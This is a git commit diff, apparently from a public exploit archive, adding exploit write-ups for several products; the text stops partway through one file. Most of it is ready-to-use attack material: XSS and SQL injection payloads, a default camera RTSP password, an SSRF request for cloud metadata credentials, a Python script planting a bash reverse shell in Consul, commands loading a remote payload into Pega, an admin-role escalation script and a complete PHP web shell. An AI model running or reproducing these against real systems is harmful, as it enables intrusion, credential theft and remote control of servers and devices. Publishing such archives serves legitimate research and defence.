DB: 2023-03-29

25 changes to exploits/shellcodes/ghdb ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS) Tapo C310 RTSP server v1.3.0 - Unauthorised Video Stream Access ZKTeco ZEM/ZMM 8.88 - Missing Authentication Hashicorp Consul v1.0 - Remote Command Execution (RCE) X-Skipper-Proxy v0.13.237 - Server Side Request Forgery (SSRF) OPSWAT Metadefender Core - Privilege Escalation Pega Platform 8.1.0 - Remote Code Execution (RCE) Beauty-salon v1.0 - Remote Code Execution (RCE) BoxBilling<=4.22.1.5 - Remote Code Execution (RCE) iBooking v1.0.8 - Arbitrary File Upload Jetpack 11.4 - Cross Site Scripting (XSS) Moodle LMS 4.0 - Cross-Site Scripting (XSS) Online shopping system advanced 1.0 - Multiple Vulnerabilities rukovoditel 3.2.1 - Cross-Site Scripting (XSS) Senayan Library Management System v9.5.0 - SQL Injection Social-Share-Buttons v2.2.3 - SQL Injection Subrion CMS 4.2.1 - Stored Cross-Site Scripting (XSS) YouPHPTube<= 7.8 - Multiple Vulnerabilities Label Studio 1.5.0 - Authenticated Server Side Request Forgery (SSRF) SuperMailer v11.20 - Buffer overflow DoS Tunnel Interface Driver - Denial of Service VMware Workstation 15 Pro - Denial of Service HDD Health 4.2.0.112 - 'HDDHealth' Unquoted Service Path SugarSync 4.1.3 - 'SugarSync Service' Unquoted Service Path
2023-03-29 00:16:31 +00:00 · 2023-03-29 00:16:31 +00:00 · 6bc7a6f9b0
commit 6bc7a6f9b0
parent b137003172
25 changed files with 1880 additions and 0 deletions
--- a/exploits/aspx/webapps/51118.txt
+++ b/exploits/aspx/webapps/51118.txt
@ -0,0 +1,23 @@
 # Exploit Title: ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS)
 # Date: 9 October 2022
 # Exploit Author: Okan Kurtulus
 # Vendor Homepage: https://reqlogic.com
 # Version: 11.3
 # Tested on: Linux
 # CVE : 2022-41441
 # Proof of Concept:
 1- Install ReQlogic v11.3
 2- Go to https://localhost:81/ProcessWait.aspx?POBatch=test&WaitDuration=3
 3- XSS is triggered when you send the XSS payload to the POBatch and WaitDuration parameters.
 #XSS Payload:
 </script><script>alert(1)</script>
 #Affected Prameters
 POBatch
 WaitDuration
 #Final URLs
 http://20.36.214.225:81/ProcessWait.aspx?POBatch=</script><script>alert(1)</script>&WaitDuration=3
 http://20.36.214.225:81/ProcessWait.aspx?POBatch=test&WaitDuration=</script><script>alert(1)</script>
--- a/exploits/hardware/remote/51107.txt
+++ b/exploits/hardware/remote/51107.txt
@ -0,0 +1,16 @@
 # Exploit Title: Tapo C310 RTSP server v1.3.0- Unauthorised Video Stream Access
 # Date: 19th July 2022
 # Exploit Author: dsclee1
 # Vendor Homepage: tp-link.com
 # Software Link: http://download.tplinkcloud.com/firmware/Tapo_C310v1_en_1.3.0_Build_220328_Rel.64283n_u_1649923652150.bin
 # Version: 1.3.0
 # Tested on: Linux – running on camera
 # CVE : CVE-2022-37255
 These Tapo cameras work via an app. There is a facility on the app to set up a “Camera Account”, which adds user details for the RTSP server. Unfortunately if you don’t set up the user details on versions 1.3.0 and below there are default login details. I sourced these from the “cet” binary on the camera.
 You can gain unauthorised access to the RTSP stream using the following user details:
 User: ---
 Password: TPL075526460603
--- a/exploits/jsp/webapps/51112.txt
+++ b/exploits/jsp/webapps/51112.txt
@ -0,0 +1,232 @@
 # Exploit Title: ZKTeco ZEM/ZMM 8.88 - Missing Authentication
 # Exploit Author: RedTeam Pentesting GmbH
 # CVE: CVE-2022-42953
 Advisory: Missing Authentication in ZKTeco ZEM/ZMM Web Interface
 The ZKTeco time attendance device does not require authentication to use the
 web interface, exposing the database of employees and their credentials.
 Details
 =======
 Product: ZKTeco ZEM500-510-560-760, ZEM600-800, ZEM720, ZMM
 Affected Versions: potentially versions below 8.88 (ZEM500-510-560-760, ZEM600-800, ZEM720) and 15.00 (ZMM200-220-210)
 Fixed Versions: firmware version 8.88 (ZEM500-510-560-760, ZEM600-800, ZEM720), firmware version 15.00 (ZMM200-220-210)
 Vulnerability Type: Missing Authentication
 Security Risk: medium
 Vendor URL: https://zkteco.eu/company/history
 Vendor Status: fixed version released
 Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-003
 Advisory Status: published
 CVE: CVE-2022-42953
 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42953
 Introduction
 ============
 "Time attendance and workforce management is an integrated set of
 processes that an institution uses to optimize the productivity of its
 employees on the individual, departmental, and entity-wide levels.
 ZKTeco has been at the forefront of time attendance solutions for the
 last 30 years, integrating advanced biometric technologies with
 innovative and versatile terminals." (from company website)
 More Details
 ============
 The ZKTeco ZEM/ZMM device allows to store a list of users and their credentials
 which may be used to log into the device to prove the users' attendance. These
 credentials can either be a PIN, a card for a variety of card readers, or a
 fingerprint. The user list can be managed through the web interface.
 When opening the web interface, for example on http://192.0.2.1/,
 the web server of the device sends a Set-Cookie header for a cookie with
 name and value similar to the following:
 -----------------------------------------------------------------------
 Set-Cookie: SessionID=1624553126; path=/;
 -----------------------------------------------------------------------
 It was determined that the value of the cookie is roughly the number of
 seconds since January 1, 1970. Since the value has a constant offset,
 that might allow attackers to guess the cookie value. After setting the
 cookie, the webserver redirects the browser to "/csl/login". The login
 form provided at this URL has its form action set to "/csl/check". If
 the user provides wrong credentials, the web server responds with an
 error message. If the user provides correct credentials, the server
 responds with a frameset.
 In this frameset various options are available, for example a user list.
 The list contains a link titled "Options" for each user item which
 references a URL similar to the following
 http://192.0.2.1/csl/user?did=0&uid=123
 Additionally, backups of all settings of the device can be downloaded
 from the backup page. The request to do so looks similar to the
 following:
 -----------------------------------------------------------------------
 POST /form/DataApp HTTP/1.1
 Host: 192.0.2.1
 User-Agent: Mozilla/5.0
 Cookie: SessionID=1624553126
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 7
 Origin: http://192.0.2.1
 Referer: http://192.0.2.1/form/Device?act=11
 style=1
 -----------------------------------------------------------------------
 When the value "1" is given for the field named "style", the web server
 responds with the file "device.dat" (corresponding to the option "Backup
 System Data" in the web interface), for all other values the server
 responds with the file "data.dat" (corresponding to the option "Backup
 User Data" in the web interface). Both files can not only be requested
 using HTTP-POST, but also using HTTP-GET with the following URLs:
 http://192.0.2.1/form/DataApp?style=1
 http://192.0.2.1/form/DataApp?style=0
 Both files are - even though it's not obvious from the filename -
 compressed tar archives. They can be extracted in the following way:
 -----------------------------------------------------------------------
 $ mv data.dat data.tgz
 $ tar xvzf data.tgz
 rwxr-xr-x root/root      0 1970-01-01 01:08 mnt/mtdblock/group.dat
 rwxr-xr-x root/root      0 1970-01-01 01:08 mnt/mtdblock/htimezone.dat
 rwxr-xr-x root/root      0 1970-01-01 01:08 mnt/mtdblock/lockgroup.dat
 rwxrwxrwx 500/513    10512 2021-06-23 07:23 mnt/mtdblock/ssruser.dat
 rwxr-xr-x root/root 819896 2021-06-18 07:23 mnt/mtdblock/tempinfo.dat
 rwxrwxrwx 500/513    19456 2005-05-05 07:05 mnt/mtdblock/template.dat
 rw-r--r-- root/root 360448 2021-06-18 07:23 mnt/mtdblock/templatev10.dat
 rwxr-xr-x root/root      0 1970-01-01 01:08 mnt/mtdblock/timezone.dat
 rwxrwxrwx 500/513     1372 2005-05-05 07:25 mnt/mtdblock/user.dat
 rwxr-xr-x root/root    120 1970-01-01 01:08 mnt/mtdblock/data/alarm.dat
 rwxr-xr-x root/root      0 2021-06-23 09:55 mnt/mtdblock/data/extlog.dat
 rwxr-xr-x root/root      0 2013-05-04 01:28 mnt/mtdblock/data/extuser.dat
 rwxr-xr-x root/root      0 1970-01-01 01:08 mnt/mtdblock/data/group.dat
 rwxr-xr-x root/root      0 1970-01-01 01:08 mnt/mtdblock/data/htimezone.dat
 rwxr-xr-x root/root      0 1970-01-01 01:08 mnt/mtdblock/data/lockgroup.dat
 rwxr-xr-x root/root  54800 2021-06-23 09:55 mnt/mtdblock/data/oplog.dat
 rwxr-xr-x root/root  33200 2021-06-23 07:23 mnt/mtdblock/data/sms.dat
 rwxr-xr-x root/root      0 2021-06-23 09:55 mnt/mtdblock/data/ssrattlog.dat
 rwxr-xr-x root/root    660 2018-11-09 17:28 mnt/mtdblock/data/stkey.dat
 rwxrwxrwx 500/513        0 2013-05-04 01:28 mnt/mtdblock/data/template.dat
 rwxr-xr-x root/root      0 1970-01-01 01:08 mnt/mtdblock/data/timezone.dat
 rwxr-xr-x root/root      0 1970-01-01 01:08 mnt/mtdblock/data/transaction.dat
 rwxr-xr-x root/root    952 2021-06-23 07:24 mnt/mtdblock/data/udata.dat
 rwxr-xr-x root/root      0 1970-01-01 01:08 mnt/mtdblock/data/user.dat
 rwxr-xr-x root/root      0 2013-05-04 01:28 mnt/mtdblock/data/wkcd.dat
 -----------------------------------------------------------------------
 In this archive, the file "mnt/mtdblock/templatev10.dat" will likely
 contain fingerprints, and the file "mnt/mtdblock/ssruser.dat" contains
 the user database. The user database contains 72 byte user records, each
 containing the privilege level, the PIN, the name of the user, data
 stored on external authentication tokens like cards, and the group of
 the user.
 While the cookie value might be guessable, it is not used for
 authentication purposes. An attacker with knowledge of the
 corresponding URLs could access the user detail view or the backup
 without any authentication.
 Proof of Concept
 ================
 http://192.0.2.1/form/DataApp?style=1
 http://192.0.2.1/form/DataApp?style=0
 http://192.0.2.1/csl/user?did=0&uid=123
 Workaround
 ==========
 Network access to the device should be limited to trustworthy persons.
 This might be hard to implement if the device is installed in a public
 space, especially if it is used for access control, too.
 Fix
 ===
 Currently, it is not known whether a newer version might fix this issue.
 Due to the age of the product, the vendor might decide not to create a
 fix at all.
 Security Risk
 =============
 Attackers with network access to a ZKTeco ZEM/ZMM time attendance device
 can get access to employee data, including the credentials used for
 accessing the time attendance device. If these credentials are used for
 other purposes than time attendance, such as physical access control,
 attackers might use them to gain access to protected areas. The actual
 risk estimate varies wildly with the kind of access control system in
 place and whether network access to the device is prevented by other
 means, such as nearby security guards. For this reason, missing
 authentication to the ZEM/ZMM web interface is estimated to pose a medium
 risk. This estimate might need to be adjusted to the specific use case
 of the device.
 Timeline
 ========
 2021-06-24 Vulnerability identified
 2021-07-12 Customer approved disclosure to vendor
 2021-07-16 Vendor notified
 2021-08-20 Vendor provides fixed firmware
 2022-09-29 Customer approved release of advisory
 2022-10-10 CVE ID requested
 2022-10-15 CVE ID assigned
 2022-10-24 Advisory published
 References
 ==========
 https://zkteco.eu/company/history
 RedTeam Pentesting GmbH
 =======================
 RedTeam Pentesting offers individual penetration tests performed by a
 team of specialised IT-security experts. Hereby, security weaknesses in
 company networks or products are uncovered and can be fixed immediately.
 As there are only few experts in this field, RedTeam Pentesting wants to
 share its knowledge and enhance the public knowledge with research in
 security-related areas. The results are made available as public
 security advisories.
 More information about RedTeam Pentesting can be found at:
 https://www.redteam-pentesting.de/
 Working at RedTeam Pentesting
 =============================
 RedTeam Pentesting is looking for penetration testers to join our team
 in Aachen, Germany. If you are interested please visit:
 https://jobs.redteam-pentesting.de/
 --
 RedTeam Pentesting GmbH                   Tel.: +49 241 510081-0
 Alter Posthof 1                           Fax : +49 241 510081-99
 52062 Aachen                    https://www.redteam-pentesting.de
 Germany                         Registergericht: Aachen HRB 14004
 Geschäftsführer:                       Patrick Hof, Jens Liebchen
--- a/exploits/multiple/remote/51111.txt
+++ b/exploits/multiple/remote/51111.txt
@ -0,0 +1,31 @@
 #Exploit Title: X-Skipper-Proxy v0.13.237 - Server Side Request Forgery (SSRF)
 #Date: 24/10/2022
 #Exploit Author: Hosein Vita & Milad Fadavvi
 #Vendor Homepage: https://github.com/zalando/skipper
 #Software Link: https://github.com/zalando/skipper
 #Version: < v0.13.237
 #Tested on: Linux
 #CVE: CVE-2022-38580
 Summary:
 Skipper prior to version v0.13.236 is vulnerable to server-side request forgery (SSRF). An attacker can exploit a vulnerable version of proxy to access the internal metadata server or other unauthenticated URLs by adding an specific header (X-Skipper-Proxy) to the http request.
 Proof Of Concept:
 1- Add header "X-Skipper-Proxy"  to your request
 2- Add the aws metadata to the path
 GET /latest/meta-data/iam/security-credentials HTTP/1.1
 Host: yourskipperdomain.com
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
 X-Skipper-Proxy: http://169.254.169.254
 Connection: close
 Reference:
 https://github.com/zalando/skipper/security/advisories/GHSA-f2rj-m42r-6jm2
--- a/exploits/multiple/remote/51117.txt
+++ b/exploits/multiple/remote/51117.txt
@ -0,0 +1,24 @@
 # Exploit Title: Hashicorp Consul v1.0 - Remote Command Execution (RCE)
 # Date: 26/10/2022
 # Exploit Author: GatoGamer1155, 0bfxgh0st
 # Vendor Homepage: https://www.consul.io/
 # Description: Exploit for gain reverse shell on Remote Command Execution via API
 # References: https://www.consul.io/api/agent/service.html
 # Tested on: Ubuntu Server
 # Software Link: https://github.com/hashicorp/consul
 import requests, sys
 if len(sys.argv) < 6:
    print(f"\n[\033[1;31m-\033[1;37m] Usage: python3 {sys.argv[0]} <rhost> <rport> <lhost> <lport> <acl_token>\n")
    exit(1)
 target = f"http://{sys.argv[1]}:{sys.argv[2]}/v1/agent/service/register"
 headers = {"X-Consul-Token": f"{sys.argv[5]}"}
 json = {"Address": "127.0.0.1", "check": {"Args": ["/bin/bash", "-c", f"bash -i >& /dev/tcp/{sys.argv[3]}/{sys.argv[4]} 0>&1"], "interval": "10s", "Timeout": "864000s"}, "ID": "gato", "Name": "gato", "Port": 80}
 try:
    requests.put(target, headers=headers, json=json)
    print("\n[\033[1;32m+\033[1;37m] Request sent successfully, check your listener\n")
 except:
    print("\n[\033[1;31m-\033[1;37m] Something went wrong, check the connection and try again\n")
--- a/exploits/multiple/webapps/51099.txt
+++ b/exploits/multiple/webapps/51099.txt
@ -0,0 +1,38 @@
 # Exploit Title: Pega Platform 8.1.0 - Remote Code Execution (RCE)
 # Google Dork: N/A
 # Date: 20 Oct 2022
 # Exploit Author: Marcin Wolak (using MOGWAI LABS JMX Exploitation Toolkit)
 # Vendor Homepage: www.pega.com
 # Software Link: Not Available
 # Version: 8.1.0 on-premise and higher, up to 8.3.7
 # Tested on: Red Hat Enterprise 7
 # CVE : CVE-2022-24082
 ;Dumping RMI registry:
 nmap -sT -sV --script rmi-dumpregistry -p 9999 <IP Address>
 ;Extracting dynamic TCP port number from the dump (in form of @127.0.0.1
 :<PORT>)
 ;Verifying that the <PORT> is indeed open (it gives 127.0.0.1 in the RMI
 dump, but actually listens on the network as well):
 nmap -sT -sV -p <PORT> <IP Address>
 ;Exploitation requires:
 ;- JVM
 ;- MOGWAI LABS JMX Exploitation Toolkit (https://github.com/mogwailabs/mjet)
 ;- jython
 ;Installing mbean for remote code execution
 java -jar jython-standalone-2.7.2.jar mjet.py --localhost_bypass <PORT> <IP
 Address> 9999 install random_password http://<Local IP to Serve Payload
 over HTTP>:6666 6666
 ;Execution of commands id & ifconfig
 java -jar jython-standalone-2.7.2.jar mjet.py --localhost_bypass <PORT> <IP
 Address> 9999 command random_password "id;ifconfig"
 ;More details:
 https://medium.com/@Marcin-Wolak/cve-2022-24082-rce-in-the-pega-platform-discovery-remediation-technical-details-long-live-69efb5437316
 Kind Regards,
 Marcin Wolak
--- a/exploits/multiple/webapps/51113.py
+++ b/exploits/multiple/webapps/51113.py
@ -0,0 +1,51 @@
 # Exploit Title: OPSWAT Metadefender Core - Privilege Escalation
 # Date: 24 October 2022
 # Exploit Author: Ulascan Yildirim
 # Vendor Homepage: https://www.opswat.com/
 # Version: Metadefender Core 4.21.1
 # Tested on: Windows / Linux
 # CVE : CVE-2022-32272
 # =============================================================================
 # This is a PoC for the Metadefender Core Privilege escalation vulnerability.
 # To use this PoC, you need a Username & Password.
 # The OMS_CSRF_TOKEN allows users to execute commands with higher privileges.
 # =============================================================================
 #!/usr/bin/env python3
 import requests
 import json
 from getpass import getpass
 url = input("Enter URL in this Format (http://website.com): ")
 username = input("Username: ")
 password = getpass("Password: ")
 url_login = url+'/login'
 url_user = url+'/user'
 logindata = {"user":username,"password":password}
 ## Get the OMS_CSRF_TOKEN & session cookie
 response_login = requests.post(url_login, json = logindata).json()
 json_str = json.dumps(response_login)
 resp = json.loads(json_str)
 token = resp['oms_csrf_token']
 session = resp['session_id']
 ## Prepare Header & Cookie
 headers = {
    "oms_csrf_token": token,
 }
 cookie = {
    "session_id_ometascan": session
 }
 ## Set Payload to get Admin role
 payload = '{"roles": ["1"]}'
 response = requests.put(url_user,headers=headers,cookies=cookie,data=payload)
 print("Response status code: "+str(response.status_code))
 if response.status_code == 200:
    print("Expolit Successful!")
 else:
    print("Exploit Unsuccessful")
--- a/exploits/php/webapps/51098.txt
+++ b/exploits/php/webapps/51098.txt
@ -0,0 +1,136 @@
 ## Exploit Title: Beauty-salon v1.0 - Remote Code Execution (RCE)
 ## Exploit Author: nu11secur1ty
 ## Date: 10.12.2022
 ## Vendor: https://code4berry.com/projects/beautysalon.php
 ## Software: https://code4berry.com/project%20downloads/beautysalon_download.php
 ## Reference: https://github.com/nu11secur1ty/NVE/blob/NVE-master/2022/NVE-2022-1012.txt
 ## Description:
 The parameter `userimage` from Beauty-salon-2022 suffers from Web
 Shell-File Upload - RCE.
 NOTE: The user permissions of this system are not working correctly, and
 the function is not sanitizing well.
 The attacker can use an already created account from someone who controls
 this system and he can upload a very malicious file by using this
 vulnerability,
 or more precisely (no sanitizing of function for edit image), for whatever
 account, then he can execute it from anywhere on the external network.
 Status: HIGH Vulnerability
 [+] Exploit:
 ```php
 <!-- Project Name : PHP Web Shell -->
 <!-- Version : 4.0 nu11secur1ty -->
 <!-- First development date : 2022/10/05 -->
 <!-- This Version development date : 2022/10/05 -->
 <!-- Moded and working with PHP 8 : 2022/10/05 -->
 <!-- language : html, css, javascript, php -->
 <!-- Developer : nu11secur1ty -->
 <!-- Web site : https://www.nu11secur1ty.com/ -->
 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "
 http://www.w3.org/TR/html4/strict.dtd">
 <html>
 <head>
 <meta http-equiv="Content-Type" content="text/html" charset="euc-kr">
 <title>PHP Web Shell Ver 4.0 by nu11secur1ty</title>
 <script type="text/javascript">
 function FocusIn(obj)
 {
 if(obj.value == obj.defaultValue)
 obj.value = '';
 }
 function FocusOut(obj)
 {
 if(obj.value == '')
 obj.value = obj.defaultValue;
 }
 </script>
 </head>
 <body>
 <b>WebShell's Location = http://<?php echo $_SERVER['HTTP_HOST']; echo
 $_SERVER['REQUEST_URI'] ?></b><br><br>
 HTTP_HOST = <?php echo $_SERVER['HTTP_HOST'] ?><br>
 REQUEST_URI = <?php echo $_SERVER['REQUEST_URI'] ?><br>
 <br>
 <form name="cmd_exec" method="post" action="http://<?php echo
 $_SERVER['HTTP_HOST']; echo $_SERVER['REQUEST_URI'] ?>">
 <input type="text" name="cmd" size="70" maxlength="500" value="Input
 command to execute" onfocus="FocusIn(document.cmd_exec.cmd)"
 onblur="FocusOut(document.cmd_exec.cmd)">
 <input type="submit" name="exec" value="exec">
 </form>
 <?php
 if(isset($_POST['exec']))
 {
 exec($_POST['cmd'],$result);
 echo '----------------- < OutPut > -----------------';
 echo '<pre>';
 foreach($result as $print)
 {
 $print = str_replace('<','<',$print);
 echo $print . '<br>';
 }
 echo '</pre>';
 }
 else echo '<br>';
 ?>
 <form enctype="multipart/form-data" name="file_upload" method="post"
 action="http://<?php echo $_SERVER['HTTP_HOST']; echo
 $_SERVER['REQUEST_URI'] ?>">
 <input type="file" name="file">
 <input type="submit" name="upload" value="upload"><br>
 <input type="text" name="target" size="100" value="Location where file will
 be uploaded (include file name!)"
 onfocus="FocusIn(document.file_upload.target)"
 onblur="FocusOut(document.file_upload.target)">
 </form>
 <?php
 if(isset($_POST['upload']))
 {
 $check = move_uploaded_file($_FILES['file']['tmp_name'], $_POST['target']);
 if($check == TRUE)
 echo '<pre>The file was uploaded successfully!!</pre>';
 else
 echo '<pre>File Upload was failed...</pre>';
 }
 ?>
 </body>
 </html>
 ```
 # Proof and Exploit:
 [href](https://streamable.com/ewdmoh)
 # m0e3:
 [href](
 https://www.nu11secur1ty.com/2022/10/beauty-salon-2022-web-shell-file-upload.html
 )
 System Administrator - Infrastructure Engineer
 Penetration Testing Engineer
 Exploit developer at https://packetstormsecurity.com/
 https://cve.mitre.org/index.html and https://www.exploit-db.com/
 home page: https://www.nu11secur1ty.com/
 hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>
 --
 System Administrator - Infrastructure Engineer
 Penetration Testing Engineer
 Exploit developer at https://packetstormsecurity.com/
 https://cve.mitre.org/index.html and https://www.exploit-db.com/
 home page: https://www.nu11secur1ty.com/
 hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>
--- a/exploits/php/webapps/51101.txt
+++ b/exploits/php/webapps/51101.txt
@ -0,0 +1,82 @@
 # Exploit Title: YouPHPTube <= 7.8 - Multiple Vulnerabilities
 # Discovery by: Rafael Pedrero
 # Discovery Date: 2021-01-31
 # Vendor Homepage: https://www.youphptube.com/
 # Software Link : https://www.youphptube.com/
 # Tested Version: 7.8
 # Tested on:  Windows 7, 10 using XAMPP
 # Vulnerability Type: LFI + Path Traversal
 CVSS v3: 7.5
 CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
 CWE: CWE-829, CWE-22
 Vulnerability description: YouPHPTube v7.8 allows unauthenticated directory
 traversal and Local File Inclusion through the parameter in an
 /?lang=PATH+TRAVERSAL+FILE (without php) GET request because of an
 include_once in locale/function.php page.
 Proof of concept:
 To detect: http://localhost/youphptube/index.php?lang=)
 An error is generated:
 Warning: preg_grep(): Compilation failed: unmatched parentheses at offset 0
 in C:\xampp\htdocs\YouPHPTube\locale\function.php on line 47
 In function.php page, we can see:
 // filter some security here
 if (!empty($_GET['lang'])) {
    $_GET['lang'] = str_replace(array("'", '"', """, "&#039;"),
 array('', '', '', ''), xss_esc($_GET['lang']));
 }
 if (empty($_SESSION['language'])) {
    $_SESSION['language'] = $config->getLanguage();
 }
 if (!empty($_GET['lang'])) {
    $_GET['lang'] = strip_tags($_GET['lang']);
    $_SESSION['language'] = $_GET['lang'];
 }
@include_once
 "{$global['systemRootPath']}locale/{$_SESSION['language']}.php";
 The parameter "lang" can be modified and load a php file in the server.
 In Document root: /phpinfo.php with this content:
 <?php echo phpinfo(); ?>
 To Get phpinfo.php: http://127.0.0.1/youphptube/?lang=../../phpinfo
 Note: phpinfo without ".php".
 The new Path is:
@include_once "{$global['systemRootPath']}locale/../../phpinfo.php";
 And you can see the PHP information into the browser.
 # Vulnerability Type: reflected Cross-Site Scripting (XSS)
 CVSS v3: 6.5
 CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
 CWE: CWE-79
 Vulnerability description: YouPHPTube 7.8 and before, does not sufficiently
 encode user-controlled inputs, resulting in a reflected Cross-Site
 Scripting (XSS) vulnerability via the
 /<YouPHPTube_path_directory>/signup?redirectUri=<XSS>, in redirectUri
 parameter.
 Proof of concept:
 http://localhost/
 <YouPHPTube_path_directory>/signup?redirectUri='"()%26%25<ScRipt>alert(1)</ScRipt>
--- a/exploits/php/webapps/51103.txt
+++ b/exploits/php/webapps/51103.txt
@ -0,0 +1,343 @@
 # Exploit Title: Online shopping system advanced 1.0 - Multiple
 Vulnerabilities
 # Discovery by: Rafael Pedrero
 # Discovery Date: 2020-09-24
 # Vendor Homepage:
 https://github.com/PuneethReddyHC/online-shopping-system-advanced
 # Software Link :
 https://github.com/PuneethReddyHC/online-shopping-system-advanced/archive/master.zip
 # Tested Version: 1.0
 # Tested on:  Windows 10 using XAMPP / Linux Ubuntu server 18.04 + Apache +
 php 5.X/7.X + MySQL
 # Recap: SQLi = 2, RCE = 1, stored XSS = 2, reflected XSS = 2: 7
 vulnerabilities
 # Vulnerability Type: SQL Injection - #1
 CVSS v3: 9.8
 CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
 CWE: CWE-89
 Vulnerability description: Online shopping system advanced 1.0 allows SQL
 injection via the admin/edit_user.php, user_id parameter.
 Proof of concept:
 Save this content in a file:
 POST http://127.0.0.1/online/admin/edit_user.php HTTP/1.1
 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
 Gecko/20100101 Firefox/70.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
 Content-Type: multipart/form-data;
 boundary=---------------------------120411781422335
 Content-Length: 489
 Origin: http://127.0.0.1
 Connection: keep-alive
 Referer: http://127.0.0.1/online/admin/edit_user.php?user_id=25
 Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263
 Upgrade-Insecure-Requests: 1
 Host: 127.0.0.1
 -----------------------------120411781422335
 Content-Disposition: form-data; name="user_id"
 25
 -----------------------------120411781422335
 Content-Disposition: form-data; name="email"
 otheruser@gmail.com
 -----------------------------120411781422335
 Content-Disposition: form-data; name="password"
 puneeth@123
 -----------------------------120411781422335
 Content-Disposition: form-data; name="btn_save"
 -----------------------------120411781422335--
 And execute SQLMAP: >python sqlmap.py -r 1.txt --dbms=mysql -p user_id
 (custom) POST parameter 'MULTIPART user_id' is vulnerable. Do you want to
 keep testing the others (if any)? [y/N]
 sqlmap identified the following injection point(s) with a total of 115
 HTTP(s) requests:
 ---
 Parameter: MULTIPART user_id ((custom) POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: -----------------------------120411781422335
 Content-Disposition: form-data; name="user_id"
 25' AND SLEEP(5) AND 'HGWF'='HGWF
 -----------------------------120411781422335
 Content-Disposition: form-data; name="email"
 otheruser@gmail.com
 -----------------------------120411781422335
 Content-Disposition: form-data; name="password"
 puneeth@123
 -----------------------------120411781422335
 Content-Disposition: form-data; name="btn_save"
 -----------------------------120411781422335--
 ---
 [16:25:28] [INFO] the back-end DBMS is MySQL
 web application technology: Apache 2.4.38, PHP 5.6.40
 back-end DBMS: MySQL >= 5.0.12
 # Vulnerability Type: SQL Injection - #2
 CVSS v3: 9.8
 CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
 CWE: CWE-89
 Vulnerability description: Online shopping system advanced 1.0 allows SQL
 injection via the action.php, proId parameter.
 Proof of concept:
 Save this content in a file:
 POST http://127.0.0.1/online/action.php HTTP/1.1
 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
 Gecko/20100101 Firefox/70.0
 Accept: */*
 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 X-Requested-With: XMLHttpRequest
 Content-Length: 49
 Origin: http://127.0.0.1
 Connection: keep-alive
 Referer: http://127.0.0.1/online/
 Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263
 Host: 127.0.0.1
 addToCart=1&proId=70
 And execute SQLMAP: >python sqlmap.py -r 1.txt --dbms=mysql -p proId
 POST parameter 'proId' is vulnerable. Do you want to keep testing the
 others (if any)? [y/N]
 sqlmap identified the following injection point(s) with a total of 72
 HTTP(s) requests:
 ---
 Parameter: proId (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: addToCart=1&proId=70' AND 7704=7704 AND 'IGsd'='IGsd
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: addToCart=1&proId=70' AND SLEEP(5) AND 'pAwv'='pAwv
 ---
 [16:03:38] [INFO] the back-end DBMS is MySQL
 web application technology: Apache 2.4.38, PHP 5.6.40
 back-end DBMS: MySQL >= 5.0.12
 # Vulnerability Type: Remote Command Execution (RCE)
 CVSS v3: 9.8
 CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
 CWE: CWE-434
 Vulnerability description: File Restriction Bypass vulnerabilities were
 found in Online shopping system advanced v1.0. This allows for an
 authenticated user to potentially obtain RCE via webshell.
 Proof of concept:
 1. Go the add product >> (admin/add_product.php)
 2.- Select product image and load a valid image.
 3. Turn Burp/ZAP Intercept On
 4. Select webshell - ex: shell.php
 5. Alter request in the upload...
   Update 'filename' to desired extension. ex: shell.php
   Not neccesary change content type to 'image/png'
 Example exploitation request:
 ====================================================================================================
 POST http://127.0.0.1/online/admin/add_product.php HTTP/1.1
 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
 Gecko/20100101 Firefox/70.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
 Content-Type: multipart/form-data;
 boundary=---------------------------184982084830387
 Content-Length: 960
 Origin: http://127.0.0.1
 Connection: keep-alive
 Referer: http://127.0.0.1/online/admin/add_product.php
 Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263
 Upgrade-Insecure-Requests: 1
 Host: 127.0.0.1
 -----------------------------184982084830387
 Content-Disposition: form-data; name="product_name"
 demo2
 -----------------------------184982084830387
 Content-Disposition: form-data; name="details"
 demo2
 -----------------------------184982084830387
 Content-Disposition: form-data; name="picture"; filename="shell.php"
 Content-Type: image/gif
 <?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>"  ?>
